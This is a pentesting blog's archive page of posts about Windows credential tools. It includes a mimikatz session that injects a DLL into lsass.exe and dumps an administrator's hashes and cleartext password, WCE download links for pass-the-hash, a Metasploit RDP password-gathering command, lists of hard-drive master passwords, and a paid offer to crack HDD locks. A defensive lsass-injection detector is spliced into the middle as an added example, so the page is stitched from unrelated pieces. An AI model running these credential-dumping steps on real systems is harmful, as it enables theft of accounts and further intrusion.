pentesting, pci, red team

Quarks PwDump

May 22nd, 2012 by admin in cracking, Password Info, Privilege Escalation

Quarks PwDump is a new open source tool to dump various types of Windows credentials.

It currently extracts:

  • Local accounts NT/LM hashes + history
  • Domain accounts NT/LM hashes + history
  • Cached domain password
  • Bitlocker recovery information (recovery passwords & key packages)

The tool is currently dedicated to working live on operating systems without injecting into any process, limiting the risk of undermining their integrity or stability. It requires administrator privileges and is still in beta test.

MimiKatz – clear text passwords

March 29th, 2012 by admin in Password Info, windows

As you’ve seen in our previous post about WCE, Windows stores your password for use in wdigest authentication. Your system needs cleartext passwords for Single Sign On with Terminal Server (tspkg provider) and the Windows Digest implementation (wdigest provider). Passwords are not kept in cleartext in memory, but because SSO needs them in plaintext form, they are encrypted in a reversible way. wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password, and not just the hash. Mimikatz is a tool to recover this plain-text password; it saves you the time and power needed to brute force a 16 character NTLM password during pen-testing or tech work. You inject a DLL into lsass.exe to recover the information needed. The blog and program are in French.

Below is a demonstration of how to use mimikatz; the commands typed follow the mimikatz # prompt:
(The privilege::debug command is not required if you are already system.)

mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */

mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 568
Attente de connexion du client…
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;160179
Package d’authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d’authentification  : TestBox64
        msv1_0 :        lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a }
        wdigest :       waza1234/
        tspkg :         waza1234/
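
From the defender's side, the DLL injection into lsass.exe shown above leaves traces in process telemetry. The following is an added example, not code from the original post or from the mimikatz project; it assumes Sysmon-style events (Event ID 8 CreateRemoteThread, Event ID 10 ProcessAccess) already parsed into dictionaries, and every sample record and path in it is constructed.

```python
# Added example: flag injection-style access to lsass.exe in Sysmon-like events.
# All event records below are constructed for illustration, not captured logs.

# Windows process access rights (values from winnt.h)
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECTION_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

def _is_lsass(path):
    # Match on file name, case-insensitively; a production rule would also
    # pin the expected full path of the system binary.
    return path.replace("/", "\\").lower().rsplit("\\", 1)[-1] == "lsass.exe"

def classify(event):
    """Return a finding string for a suspicious event, or None."""
    if not _is_lsass(event.get("TargetImage", "")):
        return None
    src = event.get("SourceImage", "?")
    if event.get("EventID") == 8:  # Sysmon: CreateRemoteThread
        return f"remote thread started in lsass.exe by {src}"
    if event.get("EventID") == 10:  # Sysmon: ProcessAccess
        granted = int(event.get("GrantedAccess", "0x0"), 16)
        # Handle rights sufficient to write memory and start a thread.
        if (granted & INJECTION_MASK) == INJECTION_MASK:
            return f"write+thread handle to lsass.exe for {src} ({granted:#x})"
    return None

def scan(events):
    """Return findings for every event that classify() flags."""
    return [finding for finding in map(classify, events) if finding]

LSASS = r"C:\Windows\System32\lsass.exe"
TOOL = r"C:\Temp\unknown_tool.exe"  # hypothetical path
SAMPLE_EVENTS = [  # constructed
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1000"},  # query-only: ignored
    {"EventID": 10, "SourceImage": TOOL,
     "TargetImage": LSASS, "GrantedAccess": "0x1fffff"},  # full access
    {"EventID": 8, "SourceImage": TOOL, "TargetImage": LSASS},
    {"EventID": 8, "SourceImage": TOOL,
     "TargetImage": r"C:\Windows\System32\notepad.exe"},  # not lsass
]

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print(line)
```

Query-only handles to lsass.exe are common from legitimate software, which is why the rule keys on the combination of write and thread-creation rights rather than on any access at all.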

Windows Credentials Editor (WCE) 1.3 x64 released

March 14th, 2012 by admin in cracking, Password Info, Privilege Escalation, windows

Windows Credentials Editor (WCE) allows you to list logon sessions and add, change, list and delete associated credentials (e.g. LM/NT hashes and Kerberos tickets). This can be used, for example, to perform pass-the-hash on Windows, to obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to perform further attacks, and to obtain Kerberos tickets and reuse them in other Windows or Unix systems. It also dumps passwords in plain text without the need to crack the hashes. Supports Windows XP, 2003, Vista, 7 and 2008.

Current Version: WCE v1.3beta (32-bit) (download) – WCE v1.3beta (64-bit) (download)

Frequently Asked Questions (FAQ) available here.

Estimating Password and Token Entropy in Web Apps

February 22nd, 2012 by admin in cracking, Password Info

Ryan O’Horo from IOActive has a great article discussing how to estimate password and token entropy using Wolfram Alpha. Check it out on IOActive’s blog.

How secure is your password?

November 28th, 2011 by admin in cracking, Life, News, Password Info

Just head over to the service’s website and enter a password in the form. You do not necessarily have to enter a password that you use actively. You can alternatively enter a comparable password to find out how long it would take to hack your password with a brute force, or maybe a combined dictionary and brute force attack.

Hard Drive Master Passwords

October 16th, 2011 by admin in Password Info, Privilege Escalation

Here’s a small compilation of passwords. If you have any to add, please email us. We can also crack DELL HDD passwords for $10.

SEAGATE -> “Seagate” +25 spaces

series N40P -> “Maxtor INIT SECURITY TEST STEP ” +1 or +2 spaces
series N40P -> “Maxtor INIT SECURITY TEST STEP F”
series 541DX -> “Maxtor” +24 spaces
series Athena (D541X model 2B) and diamondmax80 -> “Maxtor”


FUJITSU -> 32 spaces

SAMSUNG -> “ttttttttttttttttttttttttttttttttt” (32 times t)

series DTTA -> “CED79IJUFNATIT” +18 spaces
series DJNA -> “VON89IJUFSUNAJ” +18 spaces
series DPTA -> “VON89IJUFSUNAJ” +18 spaces
series DTLA -> “RAM00IJUFOTSELET” +16 spaces
series DADA-26480 (6,4gb) -> “BEF89IJUF__AIDACA” +15 spaces

HITACHI series DK23AA, DK23BA and DK23CA -> 32 spaces

TOSHIBA -> 32 spaces

For xbox hdds try “XBOXSCENE” or “TEAMASSEMBLY” too

There is also software available to reset the password, called MHDD; another suggested program is ATAPWD. A commercial tool from HDDLock claims to unlock drives, and prices vary with drive size.

Password Reset CD

October 7th, 2011 by admin in Password Info, Privilege Escalation

Looks like is now offering their password reset CD for free on their site.

PCLoginNow is an easy-to-use tool to reset local administrator and other account passwords on Windows systems. No need to reinstall the system. It resets Windows passwords and Windows security settings instantly. All versions of Windows are completely supported.

Aim Recover

October 7th, 2011 by admin in AIM, Our Tools, Password Info

Working on a newer version of our AIM password recovery tool. The newer versions of AIM 7.x changed the way they stored the saved passwords. More info to come soon 🙂

Metasploit .RDP password module

August 2nd, 2011 by admin in Our Tools, Password Info

Just finished a new module for Metasploit meterpreter post-exploitation.
Once you gain a meterpreter session, just run:
run post/windows/gather/enum_rdp_pwd

meterpreter > run post/windows/gather/enum_rdp_pwd

[*] Searching for *.rdp files in C:\Users\Will\Documents

[*] Found: C:\Users\Will\Documents\Default.rdp
[*] Host:
[*] User: Administrator
[*] Pass: metasploit


Top 10 iPhone unlock codes

June 16th, 2011 by admin in Apple, Password Info

In his last update to Big Brother Camera Security, Daniel Amitay added some code to record common user passcodes. Because Big Brother’s passcode setup screen and lock screen are nearly identical to those of the actual iPhone passcode lock, Daniel figured that the collected information would closely correlate with actual iPhone passcodes. Out of 204,508 recorded passcodes, the top ten most common were:
[1234, 0000, 2580, 1111, 5555, 5683, 0852, 2222, 1212, 1998]

